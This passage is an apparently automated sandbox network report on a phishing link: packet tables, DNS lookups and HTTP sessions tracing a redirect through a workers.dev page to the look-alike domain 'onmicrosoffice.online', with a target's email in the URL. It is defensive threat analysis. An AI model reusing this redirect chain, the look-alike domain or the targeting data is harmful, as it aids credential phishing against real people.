Apr 24, 2024 15:24:45.608833075 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608845949 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608856916 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.608895063 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.619110107 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.619132042 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.665642977 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:45.671250105 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.671327114 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.671420097 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.671716928 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.671751976 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.708158016 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:45.834654093 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:45.834693909 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:45.834748983 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:45.834806919 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:45.834810019 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:45.834868908 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:45.836304903 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:45.836339951 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:45.840775013 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:45.840854883 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:45.840960026 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:45.841202021 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:45.841233969 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.003667116 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.004089117 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.004152060 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.004487038 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.005039930 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.005101919 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.005209923 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.005254030 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.166423082 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.166755915 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.166805029 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.167109013 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.170171976 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.170247078 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.170322895 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.216123104 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.228641033 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.533837080 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.533870935 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.533904076 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.533960104 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.533971071 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.534070015 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.534810066 CEST	49778	443	192.168.2.4	172.67.203.167
Apr 24, 2024 15:24:46.534857035 CEST	443	49778	172.67.203.167	192.168.2.4
Apr 24, 2024 15:24:46.569591045 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.569611073 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.569665909 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.569681883 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.569726944 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.569737911 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.571594000 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.571625948 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.571634054 CEST	443	49777	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.571651936 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.571681023 CEST	49777	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.572542906 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.572587967 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.572746038 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.572947025 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.572961092 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.905018091 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.905335903 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.905363083 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.905702114 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.906034946 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.906128883 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:46.906222105 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:46.906245947 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:47.751184940 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:47.755325079 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:47.755386114 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:47.756011009 CEST	49779	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:47.756032944 CEST	443	49779	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:47.758922100 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:47.759006023 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:47.759177923 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:47.759700060 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:47.759740114 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.091335058 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.091629028 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:48.091674089 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.091990948 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.092468977 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:48.092535973 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.092677116 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:48.092713118 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.136426926 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:48.558526039 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.561945915 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:48.563497066 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:48.789169073 CEST	49780	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:48.789227009 CEST	443	49780	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:53.244282007 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:53.244302034 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:25:07.957062006 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:25:07.957246065 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:25:07.957299948 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:25:08.343923092 CEST	49736	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:25:08.343950987 CEST	443	49736	34.233.171.195	192.168.2.4
Apr 24, 2024 15:25:08.784234047 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:08.784308910 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:08.784394979 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:08.784620047 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:08.784653902 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:09.146656990 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:09.146938086 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:09.146956921 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:09.147416115 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:09.147895098 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:09.147967100 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:09.198451996 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:15.961750031 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 24, 2024 15:25:15.961920023 CEST	49724	80	192.168.2.4	199.232.214.172
Apr 24, 2024 15:25:16.121159077 CEST	80	49724	199.232.214.172	192.168.2.4
Apr 24, 2024 15:25:16.121180058 CEST	80	49724	199.232.214.172	192.168.2.4
Apr 24, 2024 15:25:16.121237993 CEST	49724	80	192.168.2.4	199.232.214.172
Apr 24, 2024 15:25:16.121455908 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 24, 2024 15:25:16.121471882 CEST	80	49723	199.232.210.172	192.168.2.4
Apr 24, 2024 15:25:16.121526957 CEST	49723	80	192.168.2.4	199.232.210.172
Apr 24, 2024 15:25:19.144567013 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:19.144648075 CEST	443	49783	142.250.141.99	192.168.2.4
Apr 24, 2024 15:25:19.144711971 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:20.345498085 CEST	49783	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:25:20.345532894 CEST	443	49783	142.250.141.99	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 15:24:06.091788054 CEST	53	62978	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:06.094405890 CEST	53	52064	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:07.146665096 CEST	53	53469	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:07.296122074 CEST	49568	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:07.298986912 CEST	58288	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:07.472932100 CEST	53	58288	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:07.506731987 CEST	53	49568	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:08.339656115 CEST	51487	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:08.339790106 CEST	52665	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:08.381649971 CEST	52972	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:08.381716967 CEST	60852	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:08.493129015 CEST	53	51487	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:08.493170977 CEST	53	52665	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:08.539216995 CEST	53	60852	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:08.539232016 CEST	53	52972	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:09.304271936 CEST	54688	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:09.304606915 CEST	50678	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:09.457849979 CEST	53	50678	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:09.458121061 CEST	53	54688	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:11.420804024 CEST	49911	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:11.421696901 CEST	51801	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:11.574287891 CEST	53	49911	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:11.575809956 CEST	53	51801	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:13.232336998 CEST	56097	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:13.232901096 CEST	56668	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:13.385705948 CEST	53	56097	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:13.385962963 CEST	53	56668	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:17.894500017 CEST	62109	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:17.894668102 CEST	58790	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:18.048677921 CEST	53	58790	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:18.048695087 CEST	53	62109	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:24.074372053 CEST	53	49416	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:27.585805893 CEST	138	138	192.168.2.4	192.168.2.255
Apr 24, 2024 15:24:40.284632921 CEST	57250	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:40.284632921 CEST	56222	53	192.168.2.4	1.1.1.1
Apr 24, 2024 15:24:40.639545918 CEST	53	56222	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:40.702476025 CEST	53	57250	1.1.1.1	192.168.2.4
Apr 24, 2024 15:24:42.871268988 CEST	53	57989	1.1.1.1	192.168.2.4
Apr 24, 2024 15:25:04.513475895 CEST	53	52856	1.1.1.1	192.168.2.4
Apr 24, 2024 15:25:06.126089096 CEST	53	61278	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 24, 2024 15:24:40.702749968 CEST	192.168.2.4	1.1.1.1	c228	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 15:24:07.296122074 CEST	192.168.2.4	1.1.1.1	0xac27	Standard query (0)	insidesales-email.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:07.298986912 CEST	192.168.2.4	1.1.1.1	0xc3a0	Standard query (0)	insidesales-email.com	65	IN (0x0001)	false
Apr 24, 2024 15:24:08.339656115 CEST	192.168.2.4	1.1.1.1	0x8c19	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.339790106 CEST	192.168.2.4	1.1.1.1	0xea49	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 24, 2024 15:24:08.381649971 CEST	192.168.2.4	1.1.1.1	0xa6db	Standard query (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.381716967 CEST	192.168.2.4	1.1.1.1	0xd744	Standard query (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev	65	IN (0x0001)	false
Apr 24, 2024 15:24:09.304271936 CEST	192.168.2.4	1.1.1.1	0xe778	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:09.304606915 CEST	192.168.2.4	1.1.1.1	0x35bc	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Apr 24, 2024 15:24:11.420804024 CEST	192.168.2.4	1.1.1.1	0xb34a	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:11.421696901 CEST	192.168.2.4	1.1.1.1	0x4d02	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Apr 24, 2024 15:24:13.232336998 CEST	192.168.2.4	1.1.1.1	0x54f3	Standard query (0)	challenges.cloudflare.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:13.232901096 CEST	192.168.2.4	1.1.1.1	0x5dc5	Standard query (0)	challenges.cloudflare.com	65	IN (0x0001)	false
Apr 24, 2024 15:24:17.894500017 CEST	192.168.2.4	1.1.1.1	0xd7c1	Standard query (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:17.894668102 CEST	192.168.2.4	1.1.1.1	0xfba6	Standard query (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev	65	IN (0x0001)	false
Apr 24, 2024 15:24:40.284632921 CEST	192.168.2.4	1.1.1.1	0x5c28	Standard query (0)	onmicrosoffice.online	65	IN (0x0001)	false
Apr 24, 2024 15:24:40.284632921 CEST	192.168.2.4	1.1.1.1	0x6820	Standard query (0)	onmicrosoffice.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 15:24:07.506731987 CEST	1.1.1.1	192.168.2.4	0xac27	No error (0)	insidesales-email.com		34.233.171.195	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:07.506731987 CEST	1.1.1.1	192.168.2.4	0xac27	No error (0)	insidesales-email.com		52.0.78.137	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493129015 CEST	1.1.1.1	192.168.2.4	0x8c19	No error (0)	www.google.com		142.250.141.99	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493129015 CEST	1.1.1.1	192.168.2.4	0x8c19	No error (0)	www.google.com		142.250.141.106	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493129015 CEST	1.1.1.1	192.168.2.4	0x8c19	No error (0)	www.google.com		142.250.141.104	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493129015 CEST	1.1.1.1	192.168.2.4	0x8c19	No error (0)	www.google.com		142.250.141.147	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493129015 CEST	1.1.1.1	192.168.2.4	0x8c19	No error (0)	www.google.com		142.250.141.105	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493129015 CEST	1.1.1.1	192.168.2.4	0x8c19	No error (0)	www.google.com		142.250.141.103	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.493170977 CEST	1.1.1.1	192.168.2.4	0xea49	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 24, 2024 15:24:08.539216995 CEST	1.1.1.1	192.168.2.4	0xd744	No error (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev			65	IN (0x0001)	false
Apr 24, 2024 15:24:08.539232016 CEST	1.1.1.1	192.168.2.4	0xa6db	No error (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev		104.21.52.206	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:08.539232016 CEST	1.1.1.1	192.168.2.4	0xa6db	No error (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev		172.67.203.167	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:09.457849979 CEST	1.1.1.1	192.168.2.4	0x35bc	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Apr 24, 2024 15:24:09.458121061 CEST	1.1.1.1	192.168.2.4	0xe778	No error (0)	challenges.cloudflare.com		104.17.2.184	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:09.458121061 CEST	1.1.1.1	192.168.2.4	0xe778	No error (0)	challenges.cloudflare.com		104.17.3.184	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:11.574287891 CEST	1.1.1.1	192.168.2.4	0xb34a	No error (0)	challenges.cloudflare.com		104.17.3.184	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:11.574287891 CEST	1.1.1.1	192.168.2.4	0xb34a	No error (0)	challenges.cloudflare.com		104.17.2.184	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:11.575809956 CEST	1.1.1.1	192.168.2.4	0x4d02	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Apr 24, 2024 15:24:13.385705948 CEST	1.1.1.1	192.168.2.4	0x54f3	No error (0)	challenges.cloudflare.com		104.17.2.184	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:13.385705948 CEST	1.1.1.1	192.168.2.4	0x54f3	No error (0)	challenges.cloudflare.com		104.17.3.184	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:13.385962963 CEST	1.1.1.1	192.168.2.4	0x5dc5	No error (0)	challenges.cloudflare.com			65	IN (0x0001)	false
Apr 24, 2024 15:24:18.048677921 CEST	1.1.1.1	192.168.2.4	0xfba6	No error (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev			65	IN (0x0001)	false
Apr 24, 2024 15:24:18.048695087 CEST	1.1.1.1	192.168.2.4	0xd7c1	No error (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev		172.67.203.167	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:18.048695087 CEST	1.1.1.1	192.168.2.4	0xd7c1	No error (0)	cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev		104.21.52.206	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:21.947484016 CEST	1.1.1.1	192.168.2.4	0x8f88	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 15:24:21.947484016 CEST	1.1.1.1	192.168.2.4	0x8f88	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:34.934184074 CEST	1.1.1.1	192.168.2.4	0xfc6b	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 15:24:34.934184074 CEST	1.1.1.1	192.168.2.4	0xfc6b	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:40.639545918 CEST	1.1.1.1	192.168.2.4	0x6820	No error (0)	onmicrosoffice.online		89.116.187.236	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:24:57.954679966 CEST	1.1.1.1	192.168.2.4	0x3bd2	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 15:24:57.954679966 CEST	1.1.1.1	192.168.2.4	0x3bd2	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 24, 2024 15:25:18.334309101 CEST	1.1.1.1	192.168.2.4	0xa3a7	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 15:25:18.334309101 CEST	1.1.1.1	192.168.2.4	0xa3a7	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

insidesales-email.com

cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev

https:

challenges.cloudflare.com

onmicrosoffice.online

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	34.233.171.195	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:08 UTC	840	OUT	GET /l/1/17013047/Y/eus.p01-2019.10.02-460581/1/ab/4K6W-nzk0hr_GKydLIdUc0LK4HrUUeoMK4jMzee40WM?lnk=https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com HTTP/1.1 Host: insidesales-email.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:08 UTC	269	IN	HTTP/1.1 302 Found Date: Wed, 24 Apr 2024 13:24:08 GMT Content-Type: text/plain Content-Length: 0 Connection: close Location: https://cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev/?qrc=barbara.rentler@ros.com X-Request-Id: 06590466-1103-4730-858d-965e52115f3b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.21.52.206	443	5744	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 13:24:08 UTC	716	OUT	GET /?qrc=barbara.rentler@ros.com HTTP/1.1 Host: cd14fe4e.2690c0a545a7f22e8ae6844c.workers.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-24 13:24:09 UTC	591	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 13:24:09 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 3255 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=niSgcRXFeq0WI7n%2BWBLbQF5TQEm0PXYUiMZBN%2F6KKh9Yxne7dGOgLNLlS%2FTLJcd6LG7sO3tc4NmbJtkuVzpzScc%2F0dFuK%2FqZ7Hqtjspw2BV9X37TnufEnscKEotIpPsZNdZOw8f2ulwc9m4mGLYV1ze7dRr0c%2BjKCT%2BGMpYCn%2BQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 879669752a5b0910-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 13:24:09 UTC	778	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 Data Ascii: <!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta 